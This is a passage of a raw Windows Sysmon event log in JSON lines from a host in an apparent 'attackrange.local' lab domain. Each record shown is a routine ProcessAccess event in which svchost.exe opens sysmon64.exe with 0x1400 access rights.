ll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
